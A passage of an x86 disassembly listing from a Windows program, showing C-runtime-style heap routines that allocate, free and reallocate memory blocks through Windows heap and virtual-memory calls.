jl short loc_418269
pop edi
pop esi
loc_41829D: ; CODE XREF: .text:00418257�j
push dword_494268
push 0
push dword_49426C
call ebp ; RtlFreeHeap
push dword_49426C
call ds:dword_495450 ; HeapDestroy
pop ebp
pop ebx
retn
; ---------------------------------------------------------------------------
mov eax, dword_435AC8
retn
; ---------------------------------------------------------------------------
mov eax, [esp+4]
cmp eax, 3F8h
jbe short loc_4182D0
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4182D0: ; CODE XREF: .text:004182CB�j
push 1
mov dword_435AC8, eax
pop eax
retn
; =============== S U B R O U T I N E =======================================
sub_4182D9 proc near ; CODE XREF: sub_41820B+20�p
push 140h
push 0
push dword_49426C
call ds:dword_495428 ; RtlAllocateHeap
test eax, eax
mov dword_494268, eax
jnz short loc_4182F6
retn
; ---------------------------------------------------------------------------
loc_4182F6: ; CODE XREF: sub_4182D9+1A�j
and dword_494260, 0
and dword_494264, 0
push 1
mov dword_49425C, eax
mov dword_494248, 10h
pop eax
retn
sub_4182D9 endp
; =============== S U B R O U T I N E =======================================
sub_418317 proc near ; CODE XREF: sub_415D6C+A�p
; sub_416ED2+3D�p ...
arg_0 = dword ptr 4
mov eax, dword_494264
lea ecx, [eax+eax*4]
mov eax, dword_494268
lea ecx, [eax+ecx*4]
loc_418327: ; CODE XREF: sub_418317+26�j
cmp eax, ecx
jnb short loc_41833F
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_418341
add eax, 14h
jmp short loc_418327
; ---------------------------------------------------------------------------
loc_41833F: ; CODE XREF: sub_418317+12�j
xor eax, eax
locret_418341: ; CODE XREF: sub_418317+21�j
retn
sub_418317 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418342 proc near ; CODE XREF: sub_415D6C+16�p
; sub_416ED2+89�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
push ebx
push esi
mov eax, [ecx+10h]
mov esi, edx
sub esi, [ecx+0Ch]
mov ebx, [edx-4]
add edx, 0FFFFFFFCh
push edi
shr esi, 0Fh
mov ecx, esi
mov edi, [edx-4]
imul ecx, 204h
dec ebx
mov [ebp+var_4], edi
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ebx
mov [ebp+var_10], ecx
mov ecx, [ebx+edx]
test cl, 1
mov [ebp+var_8], ecx
jnz short loc_418408
sar ecx, 4
push 3Fh
dec ecx
pop edi
mov [ebp+arg_4], ecx
cmp ecx, edi
jbe short loc_41839A
mov [ebp+arg_4], edi
loc_41839A: ; CODE XREF: sub_418342+53�j
mov ecx, [ebx+edx+4]
cmp ecx, [ebx+edx+8]
jnz short loc_4183EC
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_4183C8
mov edi, 80000000h
shr edi, cl
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+44h], edi
dec byte ptr [ecx]
jnz short loc_4183EC
mov ecx, [ebp+arg_0]
and [ecx], edi
jmp short loc_4183EC
; ---------------------------------------------------------------------------
loc_4183C8: ; CODE XREF: sub_418342+68�j
add ecx, 0FFFFFFE0h
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+0C4h], edi
dec byte ptr [ecx]
jnz short loc_4183EC
mov ecx, [ebp+arg_0]
and [ecx+4], edi
loc_4183EC: ; CODE XREF: sub_418342+60�j
; sub_418342+7D�j ...
mov ecx, [ebx+edx+8]
mov edi, [ebx+edx+4]
mov [ecx+4], edi
mov ecx, [ebx+edx+4]
mov edi, [ebx+edx+8]
add ebx, [ebp+var_8]
mov [ecx+8], edi
mov [ebp+var_C], ebx
loc_418408: ; CODE XREF: sub_418342+45�j
mov edi, ebx
sar edi, 4
dec edi
cmp edi, 3Fh
jbe short loc_418416
push 3Fh
pop edi
loc_418416: ; CODE XREF: sub_418342+CF�j
mov ecx, [ebp+var_4]
and ecx, 1
mov [ebp+var_14], ecx
jnz loc_4184C5
sub edx, [ebp+var_4]
mov ecx, [ebp+var_4]
sar ecx, 4
push 3Fh
mov [ebp+var_8], edx
dec ecx
pop edx
cmp ecx, edx
mov [ebp+arg_4], ecx
jbe short loc_418441
mov [ebp+arg_4], edx
mov ecx, edx
loc_418441: ; CODE XREF: sub_418342+F8�j
add ebx, [ebp+var_4]
mov edi, ebx
mov [ebp+var_C], ebx
sar edi, 4
dec edi
cmp edi, edx
jbe short loc_418453
mov edi, edx
loc_418453: ; CODE XREF: sub_418342+10D�j
cmp ecx, edi
jz short loc_4184C2
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
cmp edx, [ecx+8]
jnz short loc_4184AA
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_418486
mov edx, 80000000h
shr edx, cl
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+44h], edx
dec byte ptr [ecx]
jnz short loc_4184AA
mov ecx, [ebp+arg_0]
and [ecx], edx
jmp short loc_4184AA
; ---------------------------------------------------------------------------
loc_418486: ; CODE XREF: sub_418342+126�j
add ecx, 0FFFFFFE0h
mov edx, 80000000h
shr edx, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+0C4h], edx
dec byte ptr [ecx]
jnz short loc_4184AA
mov ecx, [ebp+arg_0]
and [ecx+4], edx
loc_4184AA: ; CODE XREF: sub_418342+11E�j
; sub_418342+13B�j ...
mov ecx, [ebp+var_8]
mov edx, [ecx+8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov [edx+8], ecx
loc_4184C2: ; CODE XREF: sub_418342+113�j
mov edx, [ebp+var_8]
loc_4184C5: ; CODE XREF: sub_418342+DD�j
cmp [ebp+var_14], 0
jnz short loc_4184D4
cmp [ebp+arg_4], edi
jz loc_41855D
loc_4184D4: ; CODE XREF: sub_418342+187�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_41855D
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_418531
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_418520
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_418520: ; CODE XREF: sub_418342+1CE�j
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
lea eax, [eax+esi*4+44h]
or [eax], ebx
jmp short loc_41855A
; ---------------------------------------------------------------------------
loc_418531: ; CODE XREF: sub_418342+1C8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_418547
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_418547: ; CODE XREF: sub_418342+1F3�j
lea ecx, [edi-20h]
mov edi, 80000000h
shr edi, cl
lea eax, [eax+esi*4+0C4h]
or [eax], edi
loc_41855A: ; CODE XREF: sub_418342+1ED�j
mov ebx, [ebp+var_C]
loc_41855D: ; CODE XREF: sub_418342+18C�j
; sub_418342+1B6�j
mov eax, [ebp+var_10]
mov [edx], ebx
mov [ebx+edx-4], ebx
dec dword ptr [eax]
jnz loc_418668
mov eax, dword_494260
test eax, eax
jz loc_41865A
mov ecx, dword_494258
mov edi, ds:dword_495458
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call edi ; VirtualFree
mov ecx, dword_494258
mov eax, dword_494260
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_494260
mov ecx, dword_494258
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_494260
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_494260
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_4185E8
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_494260
loc_4185E8: ; CODE XREF: sub_418342+29B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_41865A
push ebx
push 0
push dword ptr [eax+0Ch]
call edi ; VirtualFree
mov eax, dword_494260
push dword ptr [eax+10h]
push 0
push dword_49426C
call ds:dword_49542C ; RtlFreeHeap
mov eax, dword_494264
mov edx, dword_494268
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_494260
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_416430
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_494264
cmp eax, dword_494260
jbe short loc_41864C
sub eax, 14h
loc_41864C: ; CODE XREF: sub_418342+305�j
mov ecx, dword_494268
mov dword_49425C, ecx
jmp short loc_41865D
; ---------------------------------------------------------------------------
loc_41865A: ; CODE XREF: sub_418342+233�j
; sub_418342+2AA�j
mov eax, [ebp+arg_0]
loc_41865D: ; CODE XREF: sub_418342+316�j
mov dword_494260, eax
mov dword_494258, esi
loc_418668: ; CODE XREF: sub_418342+226�j
pop edi
pop esi
pop ebx
leave
retn
sub_418342 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41866D proc near ; CODE XREF: sub_415D36+E�p
; sub_416ED2+69�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_494264
mov edx, dword_494268
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_4186AD
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_4186BD
; ---------------------------------------------------------------------------
loc_4186AD: ; CODE XREF: sub_41866D+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_4186BD: ; CODE XREF: sub_41866D+3E�j
mov eax, dword_49425C
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_4186E4
loc_4186CB: ; CODE XREF: sub_41866D+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_4186E4
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_4186CB
loc_4186E4: ; CODE XREF: sub_41866D+5C�j
; sub_41866D+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_418762
mov ebx, edx
loc_4186EB: ; CODE XREF: sub_41866D+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_418707
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_418705
add ebx, 14h
jmp short loc_4186EB
; ---------------------------------------------------------------------------
loc_418705: ; CODE XREF: sub_41866D+91�j
cmp ebx, eax
loc_418707: ; CODE XREF: sub_41866D+83�j
jnz short loc_418762
loc_418709: ; CODE XREF: sub_41866D+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_41871F
cmp dword ptr [ebx+8], 0
jnz short loc_41871C
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_418709
; ---------------------------------------------------------------------------
loc_41871C: ; CODE XREF: sub_41866D+A5�j
cmp ebx, [ebp+var_4]
loc_41871F: ; CODE XREF: sub_41866D+9F�j
jnz short loc_418747
mov ebx, edx
loc_418723: ; CODE XREF: sub_41866D+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_418737
cmp dword ptr [ebx+8], 0
jnz short loc_418735
add ebx, 14h
jmp short loc_418723
; ---------------------------------------------------------------------------
loc_418735: ; CODE XREF: sub_41866D+C1�j
cmp ebx, eax
loc_418737: ; CODE XREF: sub_41866D+BB�j
jnz short loc_418747
call sub_418976
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_41875B
loc_418747: ; CODE XREF: sub_41866D:loc_41871F�j
; sub_41866D:loc_418737�j
push ebx
call sub_418A27
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_418762
loc_41875B: ; CODE XREF: sub_41866D+D8�j
xor eax, eax
jmp loc_418971
; ---------------------------------------------------------------------------
loc_418762: ; CODE XREF: sub_41866D+7A�j
; sub_41866D:loc_418707�j ...
mov dword_49425C, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_418789
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_4187C0
loc_418789: ; CODE XREF: sub_41866D+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_4187BD
loc_4187A6: ; CODE XREF: sub_41866D+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_4187A6
loc_4187BD: ; CODE XREF: sub_41866D+137�j
mov edx, [ebp+var_4]
loc_4187C0: ; CODE XREF: sub_41866D+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_4187E9
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_4187E9: ; CODE XREF: sub_41866D+16D�j
; sub_41866D+183�j
test ecx, ecx
jl short loc_4187F2
shl ecx, 1
inc edi
jmp short loc_4187E9
; ---------------------------------------------------------------------------
loc_4187F2: ; CODE XREF: sub_41866D+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_41880F
push 3Fh
pop esi
loc_41880F: ; CODE XREF: sub_41866D+19D�j
cmp esi, edi
jz loc_418924
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_418880
cmp edi, 20h
jge short loc_41884F
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_41887D
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_418880
; ---------------------------------------------------------------------------
loc_41884F: ; CODE XREF: sub_41866D+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_41887D
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_418880
; ---------------------------------------------------------------------------
loc_41887D: ; CODE XREF: sub_41866D+1D6�j
; sub_41866D+203�j
mov ebx, [ebp+arg_0]
loc_418880: ; CODE XREF: sub_41866D+1B0�j
; sub_41866D+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_418930
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_418921
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_4188F2
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_4188E0
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_4188E0: ; CODE XREF: sub_41866D+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_418921
; ---------------------------------------------------------------------------
loc_4188F2: ; CODE XREF: sub_41866D+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_41890B
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_41890B: ; CODE XREF: sub_41866D+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_418921: ; CODE XREF: sub_41866D+24E�j
; sub_41866D+283�j
mov ecx, [ebp+var_8]
loc_418924: ; CODE XREF: sub_41866D+1A4�j
test ecx, ecx
jz short loc_418933
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_418933
; ---------------------------------------------------------------------------
loc_418930: ; CODE XREF: sub_41866D+229�j
mov ecx, [ebp+var_8]
loc_418933: ; CODE XREF: sub_41866D+2B9�j
; sub_41866D+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_418969
cmp ebx, dword_494260
jnz short loc_418969
mov ecx, [ebp+var_4]
cmp ecx, dword_494258
jnz short loc_418969
and dword_494260, 0
loc_418969: ; CODE XREF: sub_41866D+2E0�j
; sub_41866D+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_418971: ; CODE XREF: sub_41866D+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_41866D endp
; =============== S U B R O U T I N E =======================================
sub_418976 proc near ; CODE XREF: sub_41866D+CC�p
mov eax, dword_494264
mov ecx, dword_494248
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_4189B9
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_494268
push edi
push dword_49426C
call ds:dword_495434 ; RtlReAllocateHeap
cmp eax, edi
jz short loc_418A09
add dword_494248, 10h
mov dword_494268, eax
mov eax, dword_494264
loc_4189B9: ; CODE XREF: sub_418976+11�j
mov ecx, dword_494268
push 41C4h
push 8
lea eax, [eax+eax*4]
push dword_49426C
lea esi, [ecx+eax*4]
call ds:dword_495428 ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_418A09
push 4
push 2000h
push 100000h
push edi
call ds:dword_49545C ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_418A0D
push dword ptr [esi+10h]
push edi
push dword_49426C
call ds:dword_49542C ; RtlFreeHeap
loc_418A09: ; CODE XREF: sub_418976+30�j
; sub_418976+67�j
xor eax, eax
jmp short loc_418A24
; ---------------------------------------------------------------------------
loc_418A0D: ; CODE XREF: sub_418976+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_494264
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_418A24: ; CODE XREF: sub_418976+95�j
pop edi
pop esi
retn
sub_418976 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418A27 proc near ; CODE XREF: sub_41866D+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_418A39: ; CODE XREF: sub_418A27+19�j
test eax, eax
jl short loc_418A42
shl eax, 1
inc ebx
jmp short loc_418A39
; ---------------------------------------------------------------------------
loc_418A42: ; CODE XREF: sub_418A27+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_418A57: ; CODE XREF: sub_418A27+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_418A57
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
call ds:dword_49545C ; VirtualAlloc
test eax, eax
jnz short loc_418A8A
or eax, 0FFFFFFFFh
jmp loc_418B1D
; ---------------------------------------------------------------------------
loc_418A8A: ; CODE XREF: sub_418A27+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_418AD0
lea eax, [edi+10h]
loc_418A97: ; CODE XREF: sub_418A27+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_418A97
loc_418AD0: ; CODE XREF: sub_418A27+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_418B0D
or [eax+4], edi
loc_418B0D: ; CODE XREF: sub_418A27+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_418B1D: ; CODE XREF: sub_418A27+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_418A27 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418B22 proc near ; CODE XREF: sub_416ED2+58�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
mov edx, edi
lea esi, [eax+17h]
sub edx, [ecx+0Ch]
mov eax, [ecx+10h]
and esi, 0FFFFFFF0h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
dec ecx
cmp esi, ecx
mov [ebp+arg_8], ecx
mov ebx, [ecx+edi-4]
lea edi, [ecx+edi-4]
mov [ebp+var_4], ebx
jle loc_418CD0
test bl, 1
jnz loc_418CC9
add ebx, ecx
cmp esi, ebx
jg loc_418CC9
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_418B99
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_418B99: ; CODE XREF: sub_418B22+6F�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_418BE9
cmp ecx, 20h
jnb short loc_418BC5
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_418BE9
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_418BE9
; ---------------------------------------------------------------------------
loc_418BC5: ; CODE XREF: sub_418B22+82�j
add ecx, 0FFFFFFE0h
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_418BE9
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_418BE9: ; CODE XREF: sub_418B22+7D�j
; sub_418B22+9A�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_418CB7
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
lea ecx, [ecx+esi-4]
cmp edi, 3Fh
jbe short loc_418C23
push 3Fh
pop edi
loc_418C23: ; CODE XREF: sub_418B22+FC�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_418CA5
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_8+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_418C7C
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_418C6F
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_418C6F: ; CODE XREF: sub_418B22+13D�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, edi
jmp short loc_418CA1
; ---------------------------------------------------------------------------
loc_418C7C: ; CODE XREF: sub_418B22+137�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_418C92
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_418C92: ; CODE XREF: sub_418B22+15E�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
mov edx, 80000000h
loc_418CA1: ; CODE XREF: sub_418B22+158�j
shr edx, cl
or [eax], edx
loc_418CA5: ; CODE XREF: sub_418B22+125�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_418CBA
; ---------------------------------------------------------------------------
loc_418CB7: ; CODE XREF: sub_418B22+E5�j
mov edx, [ebp+arg_4]
loc_418CBA: ; CODE XREF: sub_418B22+193�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_418E10
; ---------------------------------------------------------------------------
loc_418CC9: ; CODE XREF: sub_418B22+52�j
; sub_418B22+5C�j
xor eax, eax
jmp loc_418E13
; ---------------------------------------------------------------------------
loc_418CD0: ; CODE XREF: sub_418B22+49�j
jge loc_418E10
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
mov [ebp+arg_4], ebx
sar esi, 4
dec esi
mov [ebx-4], ecx
cmp esi, 3Fh
jbe short loc_418CFB
push 3Fh
pop esi
loc_418CFB: ; CODE XREF: sub_418B22+1D4�j
test byte ptr [ebp+var_4], 1
jnz loc_418D8A
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_418D14
push 3Fh
pop esi
loc_418D14: ; CODE XREF: sub_418B22+1ED�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_418D63
cmp esi, 20h
jnb short loc_418D3F
mov ebx, 80000000h
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_418D60
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_418D60
; ---------------------------------------------------------------------------
loc_418D3F: ; CODE XREF: sub_418B22+1FD�j
lea ecx, [esi-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_418D60
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_418D60: ; CODE XREF: sub_418B22+214�j
; sub_418B22+21B�j ...
mov ebx, [ebp+arg_4]
loc_418D63: ; CODE XREF: sub_418B22+1F8�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov ecx, [edi+4]
mov esi, [edi+8]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_418D8A
push 3Fh
pop esi
loc_418D8A: ; CODE XREF: sub_418B22+1DD�j
; sub_418B22+263�j
